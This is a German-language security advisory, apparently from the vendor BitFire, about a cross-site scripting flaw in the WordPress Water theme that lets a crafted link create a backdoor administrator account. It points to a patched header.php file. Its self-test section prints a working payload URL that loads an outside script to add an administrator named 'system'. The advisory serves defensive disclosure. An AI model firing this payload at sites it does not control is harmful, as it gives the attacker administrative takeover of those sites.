WordPress Water Theme Cross Site Scripting Schwachstelle

Written by: Published by: on

WordPress Wasser Theme erlaubt Angreifern administrative Rechte zu erlangen

Am 6. August 2021 veröffentlichte BitFire eine Cross-Site Scripting Schwachstelle für das WordPress Water Theme. Zum Zeitpunkt der Erstellung dieses Artikels gibt es mehrere hundert Webseiten, die das Theme verwenden. Mehrere ungeprüfte und un-escapte GET-Variablen werden zu einem Link-Tag im Kopf der Seite hinzugefügt, was zu einer Cross-Site-Scripting-Schwachstelle führt. Es ist möglich, dass die gesamte Seite kompromittiert wird, wenn der Administrator der Seite auf einen bösartigen Link klickt.

Diese Schwachstelle ermöglicht es einem Angreifer, einen Link zur Zielseite zu erstellen, der dazu führen kann, dass ein Backdoor-Administratorkonto auf der verwundbaren Seite erstellt wird, wenn der Administrator der Seite darauf klickt. Der Backdoor-Account könnte dazu verwendet werden, Malware auf die Zielseite hochzuladen und den Zugriff des eigentlichen Seitenadministrators zu beschränken.

Der Theme-Entwickler konnte nicht erreicht werden, um einen Patch für dieses Problem zu erstellen. Die folgende Patch-Datei wird von BitFire zur Verfügung gestellt. Lade die gepatchte header.php Datei mit diesem Link herunter: header.php. Ersetze dann die Datei wp-content/themes/water/header.php mit dieser gepatchten Version.

Schwachstelle bestätigen

Wenn deine Seite verwundbar ist, kannst du jeden beliebigen Beitrag (nicht die Homepage) auf deiner Seite besuchen und das Folgende an diese URL anhängen:

?preview=true&stylesheet="><script+src=https://bitfire.co/tools/wpadmin.php><&template=z

Wenn deine Seite verwundbar ist, wird ein neuer Administrator-Benutzer namens system mit dem gehackten Passwort erstellt. Achte darauf, dass du diesen Account danach wieder entfernst. Wenn der Patch erfolgreich ist, oder deine Seite eine WordPess Firewall hat, wird kein Benutzerkonto erstellt.

BitFire Kunden sind bereits vor dieser und hunderten anderen Sicherheitslücken geschützt. Schau dir unser Anleitung zur Sicherung deiner WordPress oder anderen PHP Seite für Anleitungen, wie du verhindern kannst, dass deine Seite gehackt wird.

Cory Marsh
Cory Marsh
Share:
Cory Marsh has over 20 years Internet security experience. He is a lead developer on the BitFire project and regularly releases PHP security and programming vidoes on BitFire's you tube channel.

Security Guide

Find out the best tricks and tips to secure your website.

Get WebSite Security Notifications

From us to your inbox weekly.